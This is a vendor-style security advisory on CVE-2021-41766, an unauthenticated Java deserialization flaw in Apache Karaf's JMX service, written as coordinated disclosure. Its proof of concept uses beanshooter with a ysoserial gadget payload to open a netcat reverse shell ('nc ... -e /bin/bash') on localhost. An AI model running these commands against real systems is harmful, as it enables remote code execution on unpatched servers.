usd-2021-0025 (CVE-2021-41766) | Apache Karaf


Advisory ID: usd-2021-0025
CVE Number: CVE-2021-41766
Product: Apache Karaf
Affected Version: <= 4.3.2
Vulnerability Type: CWE-502: Deserialization of Untrusted Data
Security Risk: High
Vendor URL: https://karaf.apache.org/
Vendor Status: Fixed

Description

Apache Karaf allows monitoring of applications and the Java runtime by using the Java Management Extensions (JMX).
JMX is a Java RMI based technology that relies on Java serialized objects for client server communication.
Whereas the default JMX implementation is hardened against unauthenticated deserialization attacks, the implementation
used by Apache Karaf is not protected against this kind of attack.

The impact of Java deserialization vulnerabilities strongly depends on the classes that are available within the targets
class path. We did not look for available gadget chains within Apache Karaf and are not aware of any existing chains. However,
deserialization of untrusted data does always represent a high security risk and should be prevented.

Proof of Concept (PoC)

To verify the vulnerability one can obtain a binary distribution of Apache Karaf.
After unpacking, Karaf can be started by executing ./bin/karaf, which drops into an interactive console and starts some
services in the background. One of these services is the JMX service, that is by default listening on port 1099.

Before the default implementation of JMX was hardened in 2016, it was vulnerable to pre authenticated deserialization attacks.
CVE-2016-3427 was assigned for this vulnerability and it can be exploited by using tools like e.g. beanshooter.
As the deserialization vulnerability in Karaf is very similar, we can use beanshooter to verify the vulnerability.

The following listing shows a corresponding proof of concept. To make the vulnerability exploitable, we copy a library with
known deserialization gadgets to the classpath before starting Karaf. Afterwards, we use beanshooter to obtain code execution:

Start Karaf:

[user@host apache-karaf-4.3.2]$ cp /tmp/commons-collections-3.1.jar lib/
[user@host apache-karaf-4.3.2]$ ./bin/karaf
__ __ ____
/ //_/____ __________ _/ __/
/ ,< / __ `/ ___/ __ `/ /_
/ /| |/ /_/ / / / /_/ / __/
/_/ |_|__,_/_/ __,_/_/

Apache Karaf (4.3.2)

Hit '<tab>' for a list of available commands
and '[cmd] --help' for help on a specific command.
Hit '<ctrl-d>' or type 'system:shutdown' or 'logout' to shutdown Karaf.

karaf@root()>

Exploit with beanshooter:

[user@host apache-karaf-4.3.2]$ beanshooter --bound-name karaf-root 127.0.0.1 1099 cve-2016-3427 CommonsCollections6 "nc 127.0.0.1 4444 -e /bin/bash""
[+] Creating ysoserial payload...done.
[+] cve-2016-3427 - Sending serialized Object as credential.
[+] An SecurityException during the connection attempt is expected.
[+] Connecting to JMX server...
[-] The following exception was thrown: Expected String[2], got java.util.HashSet

Remote Code Execution:

[user@host ~]$ nc -vlp 4444
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 127.0.0.1.
Ncat: Connection from 127.0.0.1:41828.
id
uid=1000(user) gid=1000(user) groups=1000(user)

Fix

To fix the Java deserialization vulnerability, it is recommended to configure an ObjectInputFilter for the JMX service.
This can be done by setting a suitable filter configuration for the jmx.remote.rmi.server.credentials.filter.pattern key that can
be specified within the environment variables when creating a new JMX server instance. A corresponding example can be found
within the current JMX default implementation.

Timeline

  • 2021-08-16: Vulnerability identified by Konstantin Samuel and Tobias Neitzel.
  • 2021-08-25: Advisory sent to security@apache.org.
  • 2021-08-30: Investigation started by vendor.
  • 2021-12-30: Status update requested from vendor.
  • 2022-03-10: Advisory for CVE-2021-41766 is released by Apache.
  • 2022-04-24: Security advisory released by usd AG.

Credits

This security vulnerability was found by Konstantin Samuel and Tobias Neitzel of usd AG.